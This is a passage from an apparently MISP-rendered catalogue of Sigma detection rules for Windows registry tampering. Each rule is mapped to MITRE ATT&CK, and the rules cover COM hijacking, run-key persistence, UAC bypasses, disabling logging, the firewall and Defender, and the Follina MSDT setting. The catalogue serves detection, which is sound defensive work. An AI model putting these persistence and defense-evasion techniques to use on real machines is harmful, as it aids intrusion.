https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_privacy_settings_experience.yml

Usage of Renamed Sysinternals Tools - RegistrySet

Detects non-Sysinternals tools setting the "accepteula" key, which is normally set on Sysinternals tool execution.

The tag is: misp-galaxy:sigma-rules="Usage of Renamed Sysinternals Tools - RegistrySet"

Usage of Renamed Sysinternals Tools - RegistrySet has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 9373. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml

COM Hijacking via TreatAs

Detects modification of the TreatAs key to enable the "rundll32.exe -sta" command.

The tag is: misp-galaxy:sigma-rules="COM Hijacking via TreatAs"

COM Hijacking via TreatAs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"

Table 9374. Table References

Links

https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_treatas_persistence.yml

PowerShell Script Execution Policy Enabled

Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed.

The tag is: misp-galaxy:sigma-rules="PowerShell Script Execution Policy Enabled"

Table 9375. Table References

Links

https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScripts

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml

New File Association Using Exefile

Detects the abuse of the exefile handler in a new file association, used to bypass security products.

The tag is: misp-galaxy:sigma-rules="New File Association Using Exefile"

Table 9376. Table References

Links

https://twitter.com/mrd0x/status/1461041276514623491

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_file_association_exefile.yml

Disable Windows Event Logging Via Registry

Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel

The tag is: misp-galaxy:sigma-rules="Disable Windows Event Logging Via Registry"

Disable Windows Event Logging Via Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 9377. Table References

Links

https://twitter.com/WhichbufferArda/status/1543900539280293889

https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml

New BgInfo.EXE Custom VBScript Registry Configuration

Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe"

The tag is: misp-galaxy:sigma-rules="New BgInfo.EXE Custom VBScript Registry Configuration"

New BgInfo.EXE Custom VBScript Registry Configuration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9378. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bginfo_custom_vbscript.yml

Registry Persistence via Service in Safe Mode

Detects the modification of the registry to allow a driver or service to persist in Safe Mode.

The tag is: misp-galaxy:sigma-rules="Registry Persistence via Service in Safe Mode"

Registry Persistence via Service in Safe Mode has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

Table 9379. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml

Scheduled TaskCache Change by Uncommon Program

Monitors the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process other than svchost.exe, which is suspicious.

The tag is: misp-galaxy:sigma-rules="Scheduled TaskCache Change by Uncommon Program"

Scheduled TaskCache Change by Uncommon Program has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 9380. Table References

Links

https://labs.f-secure.com/blog/scheduled-task-tampering/

https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml

Macro Enabled In A Potentially Suspicious Document

Detects registry changes to Office trust records where the path is located in a potentially suspicious location

The tag is: misp-galaxy:sigma-rules="Macro Enabled In A Potentially Suspicious Document"

Macro Enabled In A Potentially Suspicious Document has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9381. Table References

Links

Internal Research

https://twitter.com/inversecos/status/1494174785621819397

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_trust_record_susp_location.yml

Suspicious Powershell In Registry Run Keys

Detects potential PowerShell commands or code within registry run keys

The tag is: misp-galaxy:sigma-rules="Suspicious Powershell In Registry Run Keys"

Suspicious Powershell In Registry Run Keys has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9382. Table References

Links

https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html

https://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml

Registry Persistence via Explorer Run Key

Detects a possible persistence mechanism using the Run key for Windows Explorer pointing to a suspicious folder.

The tag is: misp-galaxy:sigma-rules="Registry Persistence via Explorer Run Key"

Registry Persistence via Explorer Run Key has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9383. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml

Potential Persistence Via GlobalFlags

Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via GlobalFlags"

Potential Persistence Via GlobalFlags has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Image File Execution Options Injection - T1546.012" with estimative-language:likelihood-probability="almost-certain"

Table 9384. Table References

Links

https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/

https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_globalflags.yml

Persistence Via Disk Cleanup Handler - Autorun

Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun. The disk cleanup manager is part of the operating system. It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager’s UI. Although Windows comes with a number of disk cleanup handlers, they aren’t designed to handle files produced by other applications. Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.

The tag is: misp-galaxy:sigma-rules="Persistence Via Disk Cleanup Handler - Autorun"

Table 9385. Table References

Links

https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/

https://persistence-info.github.io/Data/diskcleanuphandler.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml

Potential Persistence Via Excel Add-in - Registry

Detects potential persistence via the creation of an Excel add-in (XLL) file that runs automatically when Excel is started.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Excel Add-in - Registry"

Potential Persistence Via Excel Add-in - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Add-ins - T1137.006" with estimative-language:likelihood-probability="almost-certain"

Table 9386. Table References

Links

https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence

https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_xll.yml

Potential Persistence Via MyComputer Registry Keys

Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via MyComputer Registry Keys"

Table 9387. Table References

Links

https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_mycomputer.yml

New RUN Key Pointing to Suspicious Folder

Detects suspicious new RUN key element pointing to an executable in a suspicious folder

The tag is: misp-galaxy:sigma-rules="New RUN Key Pointing to Suspicious Folder"

New RUN Key Pointing to Suspicious Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9388. Table References

Links

https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml

Custom File Open Handler Executes PowerShell

Detects the abuse of a custom file open handler that executes PowerShell.

The tag is: misp-galaxy:sigma-rules="Custom File Open Handler Executes PowerShell"

Custom File Open Handler Executes PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 9389. Table References

Links

https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/?cmp=30728

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_custom_file_open_handler_powershell_execution.yml

Service Binary in Suspicious Folder

Detects the creation of a service with a service binary located in a suspicious directory.

The tag is: misp-galaxy:sigma-rules="Service Binary in Suspicious Folder"

Service Binary in Suspicious Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9390. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_creation_service_susp_folder.yml

NET NGenAssemblyUsageLog Registry Key Tamper

Detects changes to the NGenAssemblyUsageLog registry key. The .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the registry or by configuring an environment variable (as described in the next section of the referenced article). By simply specifying an arbitrary value (e.g. a fake output location or junk data) in place of the expected value, no Usage Log file is created for the .NET execution context.

The tag is: misp-galaxy:sigma-rules="NET NGenAssemblyUsageLog Registry Key Tamper"

NET NGenAssemblyUsageLog Registry Key Tamper has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9391. Table References

Links

https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml

Common Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

The tag is: misp-galaxy:sigma-rules="Common Autorun Keys Modification"

Common Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9392. Table References

Links

https://persistence-info.github.io/Data/userinitmprlogonscript.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml

ETW Logging Disabled For rpcrt4.dll

Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll

The tag is: misp-galaxy:sigma-rules="ETW Logging Disabled For rpcrt4.dll"

ETW Logging Disabled For rpcrt4.dll has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 9393. Table References

Links

http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml

Potential Persistence Via Scrobj.dll COM Hijacking

Detects use of scrobj.dll, which looks up the ScriptletURL key to obtain the location of the script to execute.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Scrobj.dll COM Hijacking"

Potential Persistence Via Scrobj.dll COM Hijacking has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"

Table 9394. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_scrobj_dll.yml

Allow RDP Remote Assistance Feature

Detects enabling of the RDP remote assistance feature to allow a specific user to connect via RDP to the targeted machine.

The tag is: misp-galaxy:sigma-rules="Allow RDP Remote Assistance Feature"

Allow RDP Remote Assistance Feature has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9395. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml

RDP Sensitive Settings Changed

Detects tampering with sensitive RDP Terminal Service/Server settings, such as allowing unauthorized users access to a system via 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.

The tag is: misp-galaxy:sigma-rules="RDP Sensitive Settings Changed"

RDP Sensitive Settings Changed has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9396. Table References

Links

https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03

https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/

https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-64---disable-remote-desktop-security-settings-through-registry

https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html

http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/

https://blog.sekoia.io/darkgate-internals/

https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html

https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-63---disable-remote-desktop-anti-alias-setting-through-registry

https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services

http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml

Add Port Monitor Persistence in Registry

Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.

The tag is: misp-galaxy:sigma-rules="Add Port Monitor Persistence in Registry"

Add Port Monitor Persistence in Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Port Monitors - T1547.010" with estimative-language:likelihood-probability="almost-certain"

Table 9397. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml

Office Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

The tag is: misp-galaxy:sigma-rules="Office Autorun Keys Modification"

Office Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9398. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml

Wow6432Node Classes Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

The tag is: misp-galaxy:sigma-rules="Wow6432Node Classes Autorun Keys Modification"

Wow6432Node Classes Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9399. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml

Registry Hide Function from User

Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)

The tag is: misp-galaxy:sigma-rules="Registry Hide Function from User"

Registry Hide Function from User has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9400. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_function_user.yml

Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting

Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting"

Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Event Triggered Execution - T1546" with estimative-language:likelihood-probability="almost-certain"

Table 9401. Table References

Links

https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml

Suspicious Set Value of MSDT in Registry (CVE-2022-30190)

Detects the setting of the ms-msdt MSProtocol URI scheme value in the Registry, which could be an attempt to exploit CVE-2022-30190.

The tag is: misp-galaxy:sigma-rules="Suspicious Set Value of MSDT in Registry (CVE-2022-30190)"

Suspicious Set Value of MSDT in Registry (CVE-2022-30190) has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Template Injection - T1221" with estimative-language:likelihood-probability="almost-certain"

Table 9402. Table References

Links

https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml

Potential Persistence Via COM Search Order Hijacking

Detects potential COM object hijacking leveraging the COM Search Order

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via COM Search Order Hijacking"

Potential Persistence Via COM Search Order Hijacking has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"

Table 9403. Table References

Links

https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml

UAC Bypass Abusing Winsat Path Parsing - Registry

Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Abusing Winsat Path Parsing - Registry"

UAC Bypass Abusing Winsat Path Parsing - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9404. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_winsat.yml

UAC Bypass Using Windows Media Player - Registry

Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using Windows Media Player - Registry"

UAC Bypass Using Windows Media Player - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9405. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_wmp.yml

Internet Explorer DisableFirstRunCustomize Enabled

Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.

The tag is: misp-galaxy:sigma-rules="Internet Explorer DisableFirstRunCustomize Enabled"

Table 9406. Table References

Links

https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf

https://admx.help/?Category=InternetExplorer&Policy=Microsoft.Policies.InternetExplorer::NoFirstRunCustomise

https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml

Windows Defender Exclusions Added - Registry

Detects the setting of Windows Defender exclusions

The tag is: misp-galaxy:sigma-rules="Windows Defender Exclusions Added - Registry"

Windows Defender Exclusions Added - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9408. Table References

Links

https://twitter.com/_nullbind/status/1204923340810543109

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_defender_exclusions.yml

Change Winevt Event Access Permission Via Registry

Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel

The tag is: misp-galaxy:sigma-rules="Change Winevt Event Access Permission Via Registry"

Change Winevt Event Access Permission Via Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 9409. Table References

Links

https://learn.microsoft.com/en-us/windows/win32/api/winevt/

https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/

https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml

WinSock2 Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

The tag is: misp-galaxy:sigma-rules="WinSock2 Autorun Keys Modification"

WinSock2 Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9410. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml

Potential PSFactoryBuffer COM Hijacking

Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL.

The tag is: misp-galaxy:sigma-rules="Potential PSFactoryBuffer COM Hijacking"

Potential PSFactoryBuffer COM Hijacking has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"

Table 9411. Table References

Links

https://www.virustotal.com/gui/file/6d3ab9e729bb03ae8ae3fcd824474c5052a165de6cb4c27334969a542c7b261d/detection

https://strontic.github.io/xcyclopedia/library/clsid_C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6.html

https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html

https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml

Disabled Windows Defender Eventlog

Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections

The tag is: misp-galaxy:sigma-rules="Disabled Windows Defender Eventlog"

Disabled Windows Defender Eventlog has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9413. Table References

Links

https://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml

Enable Local Manifest Installation With Winget

Detects changes to the AppInstaller (winget) policy, specifically the activation of local manifest installation, which allows a user to install new packages via custom manifests.

The tag is: misp-galaxy:sigma-rules="Enable Local Manifest Installation With Winget"

Table 9414. Table References

Links

https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winget_enable_local_manifest.yml

Enable LM Hash Storage

Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.

The tag is: misp-galaxy:sigma-rules="Enable LM Hash Storage"

Enable LM Hash Storage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9415. Table References

Links

https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password

https://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_system_lsa_nolmhash.yml

Disable Windows Firewall by Registry

Detects setting EnableFirewall to 0 to disable the Windows Firewall

The tag is: misp-galaxy:sigma-rules="Disable Windows Firewall by Registry"

Disable Windows Firewall by Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 9416. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.004/T1562.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_firewall.yml

Potential Persistence Via Custom Protocol Handler

Detects potential persistence activity via the registration of a new custom protocol handler. While legitimate applications often register protocol handlers during installation, an attacker can abuse this by setting a custom handler to be used as a persistence mechanism.

